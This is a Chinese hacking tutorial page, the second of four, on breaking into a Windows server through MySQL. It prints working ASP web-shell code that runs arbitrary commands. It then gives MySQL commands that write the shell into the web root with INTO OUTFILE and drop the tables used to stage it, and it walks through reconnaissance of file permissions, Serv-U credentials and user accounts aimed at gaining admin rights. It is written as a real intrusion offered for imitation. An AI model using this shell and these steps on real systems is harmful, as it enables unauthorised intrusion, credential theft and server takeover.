文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术网络安全通过Mysql入侵服务器
精品推荐
特别推荐
·无线入侵的技术细节
·SQL注入和CSS攻击的检测
·详解:五种Windows常用密码设置
·浅析黑客攻击时的常用方法和攻击步骤
·不怕攻击 家庭上网必学八招安全绝招
·入门者如何获取肉鸡
·Linux安全配置步骤简述
·Wi-Fi网络安全探讨及组网策略
·网页病毒的概念
·保障您网站安全的十点技巧
热点TOP10
·PING命令的小秘密
·不怕攻击 家庭上网必学八招安全绝招
·内网数据库服务器入侵实战
·六个简单方法防止上网被钓鱼
·网络安全指南--中小企业网络安全指南
·大网站是保障网络安全的技巧
·预防网络病毒的几个忠告
·认识“瞬时攻击“的危险性
·网站安全:单引号导致的网站崩溃 L-blog入侵实录
·FoxMail和OICQ泄密

通过Mysql入侵服务器

日期:2008年5月8日 作者: 查看:[大字体 中字体 小字体]


Set oFileSys = Server.CreateObject(""Scripting.FileSystemObject"")
szCMD = Request.Form("".CMD"")
If (szCMD 〈〉 """") Then
szTempFile = ""C:\" & oFileSys.GetTempName()
Call oScript.Run (""cmd.exe /c "" & szCMD & "" 〉 "" & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If %〉
〈HTML〉〈BODY〉〈FORM action=""〈%= Request.ServerVariables(""URL"") %〉"" method=""POST""〉
〈input type=text name="".CMD"" size=45 value=""〈%= szCMD %〉""〉〈input type=submit value=""Run""〉〈/FORM〉〈PRE〉
〈% If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If%〉
〈/BODY〉〈/HTML〉

----------------------------end of cmd.asp-----------------------------------

  由于往mysql数据库中插入数据的时候,会过滤特殊字符什么的,例如双引号之类的,特别麻烦。各位留意没有,上面的ASP语句中,都是

两个双引号一起的,这样才能写进去,原来是一个双引号的。然后我在数据库中再建一个表:

mysql〉 use test;create table cmd(str TEXT);
Database changed
Query OK, 0 rows affected (0.05 sec)

  然后用如下语句,一句一句把上面的ASP写进去:

mysql〉 insert into cmd values("一行一行的asp代码,呵呵");

  为什么不全部一起写进去呢?呵呵,换行后,一会儿导出的文件就会有特殊字符了,asp就不能正常运行了,只能辛苦点一行一行写了。然 后把asp文件导到服务器上:

mysql〉select * from cmd into outfile "d:\\www\\gb\\abou\\cmd.asp";

  然后把我们刚才建的表都删除掉:

mysql〉 use test; drop table tmp; drop table cmd;

  ok!我们得到一个shell了,虽然权限不高,但毕竟已经向取得admin权限迈出一大步了,不是吗,呵呵。做这个asp文件可花了我不少时间 哦。现在我们利用这个shell来收集系统信息,尝试取得admin权限。

〈1〉先看一下系统文件权限设置如何:
c:\ Everyone:(OI)(CI)F
d:\ \xxx:(OI)(CI)(DENY)(特殊访问:)
DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
STANDARD_RIGHTS_REQUIRED
FILE_READ_DATA
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_READ_EA
FILE_WRITE_EA
FILE_EXECUTE
FILE_DELETE_CHILD
FILE_READ_ATTRIBUTES
FILE_WRITE_ATTRIBUTES

Everyone:(OI)(CI)F

  看来我们现在就可以读写硬盘上的任何文件了,现在就可以改他的首页了,但这样做没意思,对不对,我们的目标是取得admin权限,呵呵
〈2〉然后搜索一下硬盘上都有些什么文件:

c:\Program Files 的目录下有两个比较有意思的文件,

2000-12-19 13:10  Serv-U
2001-01-20 22:43 绿色警戒

把Serv-U里面的用户和密码读出来看看后,没有什么用处,然后进入绿色警戒目录看看,呵呵,除了log外,什么都没有,呵呵。

〈3〉再看看都有哪些用户:

Guest IUSR_SERVER_1 IUSR_SERVER-2
IWAM_SERVER_1 IWAM_SERVER-2 ceo[他们CEO的帐号J]
TsInternetUser

  管理员有ceo 和target\Domain Admins,看来这台机器是他们域中的一台服务器。开始本来想给ceo下一个套,在他的启动目录里放一个程

序,但后来看到这个帐号已经几个月没登陆了,就放弃了。

〈4〉看看启动了那些服务,这几个比较有意思, 看来都是默认的:

Task Scheduler

上一页 [1] [2] [3] [4] 下一页 




上一篇:常见IP碎片攻击详解

下一篇:Asp限制IP访问

相关文章:
·一次入侵过程的公开分析
·解决与HTTP 500 – 内部服务器错误错误信息有关的问题
·黑客技术之知道对方IP入侵别人的电脑
·何谓HTTP 500内部服务器错误
·快速利用135端口入侵个人电脑
·代理服务器使用原理与选购细则
·自学通过CCNA考试完全指南(实用版)
·通过AWARD BIOS识别主板型号
·各位网友能不能告诉我个速度快点的电信HTTP代理服务器?
·经典:各个网络端口的入侵方法
相关软件:
·SQL/MYSQL/数据库教程专栏
·怪鸡飞碟入侵
·腾讯企业QQ 服务器端 V 3.0.3
·勤哲Excel勤哲Excel服务器2007企业版V7.1.2
·架设自己的QQ服务器
·思科安全入侵检测系统专家指南
·Mysql数据库视频教程教程对你有帮助了,你就做种
·猴脑入侵(Monkey Brains)
·怪鸡飞碟入侵(Moorhuhn Invasion)
·邪灵入侵(Evil Invasion)

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot